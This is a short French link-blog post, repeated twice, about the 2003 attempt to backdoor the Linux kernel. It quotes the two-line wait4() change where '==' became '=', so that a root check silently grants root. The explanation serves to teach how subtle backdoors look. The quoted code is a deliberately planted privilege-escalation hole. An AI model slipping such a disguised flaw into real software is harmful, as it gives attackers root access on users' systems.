An attempt to backdoor the kernel [LWN.net]
mercredi 25 septembre 2013 à 17:16 Sebsauvage, le 25/09/2013 à 17:16
Ça ressemble à quoi une backdoor dans un Kernel linux ?
C'est aussi simple que remplacer "==" par "=" comme cela a été fait dans ces deux lignes de code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
Ce qui ressemblait à l'origine à un contrôle de droits ("L'utilisateur est-il bien root ?") devient "On DONNE les droits root".
Donc n'importe qui qui aurait appelé cette fonction système wait4() avec ces deux flags actifs aurait obtenu l'accès root.
Un seul caractère supprimé, et voilà une backdoor pour obtenir l'accès root sur un système. Devil is in the details.
(Permalink)
Ça ressemble à quoi une backdoor dans un Kernel linux ?
C'est aussi simple que remplacer "==" par "=" comme cela a été fait dans ces deux lignes de code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
Ce qui ressemblait à l'origine à un contrôle de droits ("L'utilisateur est-il bien root ?") devient "On DONNE les droits root".
Donc n'importe qui qui aurait appelé cette fonction système wait4() avec ces deux flags actifs aurait obtenu l'accès root.
Un seul caractère supprimé, et voilà une backdoor pour obtenir l'accès root sur un système. Devil is in the details.
(Permalink)